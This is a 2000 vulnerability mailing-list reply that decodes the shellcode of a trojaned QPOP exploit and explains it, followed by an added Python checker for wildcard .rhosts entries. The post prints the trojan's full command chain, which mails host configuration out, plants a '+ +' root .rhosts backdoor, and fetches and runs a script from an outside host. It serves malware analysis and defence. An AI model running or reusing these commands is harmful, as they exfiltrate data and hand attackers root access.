Vulnerability Development mailing list archives

Re: QPOP2.5* exploit ??


From: dim@XS4ALL.NL (Dimitry Andric)
Date: Mon, 15 May 2000 00:13:19 +0200



On 2000-05-14 at 12:30 Ryan Sweat wrote:

this has been found in the wild, however there seems to be a trojan
in the shellcode.  Popper 2.5* has been thought to be safe.  I would
not recommend running this on your own machine unless you crack the
shellcode and see what it does.

--snip--


This code un-xors itself, then runs "sh -c" with the following
commands:

/sbin/ifconfig -a | mail -s solwaretcownz@hotmail.com >> /dev/null;
echo '+ +' >> ~root/.rhosts;
rcp lp@skinner.trdlnk.com:/usr/spool/lp/model/solwar.tar solwar.tar;
tar -xvf solwar* >> /dev/null;
cd solwar;
chmod +x solwar.sh;
./solwar.sh >> /dev/null;
cd ..;
rm -rf solwar*;

So this:
1. Mails your IP configuration to <solwaretcownz@hotmail.com>,
whoever that may be.
2. Adds '+ +' to your root's .rhosts file
3. Downloads a tar file from skinner.trdlnk.com and extracts it
4. Runs the solwar.sh script inside
5. Removes the extracted stuff

I haven't been able to check out the tar file, since my rcp says:
"rcp: /usr/spool/lp/model/solwar.tar: No such file or directory". Has
anybody else been able to download it? Please mail it (or the
relevant parts) to me and/or the list.

Cheers,
--
Dimitry Andric <dim@xs4all.nl>
PGP key: http://www.xs4all.nl/~dim/dim.asc
KeyID: 4096/1024-0x2E2096A3
Fingerprint: 7AB4 62D2 CE35 FC6D 4239 4FCD B05E A30A 2E20 96A3

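Added defender-side example, not code from the post or from the trojan: a small parser for the .rhosts format that flags the wildcard trust entry the decoded command appends to ~root/.rhosts. The sample file contents (SAMPLE_RHOSTS) are constructed.

```python
# Added example, not from the post: audit .rhosts for the wildcard trust
# entries the decoded command appends ('+ +'). SAMPLE_RHOSTS is constructed.
from dataclasses import dataclass
from typing import List, Optional

@dataclass
class RhostsEntry:
    host: str
    user: Optional[str]  # None: same username as the local account
    line_no: int

    @property
    def any_host(self) -> bool:
        return self.host == "+"  # bare '+' trusts every host

    @property
    def any_user(self) -> bool:
        return self.user == "+"  # bare '+' trusts every remote user

def parse_rhosts(text: str) -> List[RhostsEntry]:
    """Parse the 'host [user]' per-line .rhosts format. Blank lines are
    skipped; '+@netgroup' and '-host' are kept literally, since they are
    not the bare wildcard."""
    entries = []
    for n, raw in enumerate(text.splitlines(), start=1):
        fields = raw.split()
        if not fields:
            continue
        user = fields[1] if len(fields) > 1 else None
        entries.append(RhostsEntry(fields[0], user, n))
    return entries

def wildcard_entries(text: str) -> List[RhostsEntry]:
    """Entries trusting any host and/or any user. '+ +' lets any user on
    any host rlogin/rsh as this account with no password."""
    return [e for e in parse_rhosts(text) if e.any_host or e.any_user]

def describe(e: RhostsEntry) -> str:
    if e.any_host and e.any_user:
        return f"line {e.line_no}: any user from any host (full backdoor)"
    if e.any_host:
        return f"line {e.line_no}: user {e.user or '(same name)'} from any host"
    return f"line {e.line_no}: any user from host {e.host}"

# Constructed sample: one legitimate entry, then the trojan's appended line.
SAMPLE_RHOSTS = "backup.example.internal oper\n+ +\n"
if __name__ == "__main__":
    for entry in wildcard_entries(SAMPLE_RHOSTS):
        print(describe(entry))  # line 2: any user from any host (full backdoor)
```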

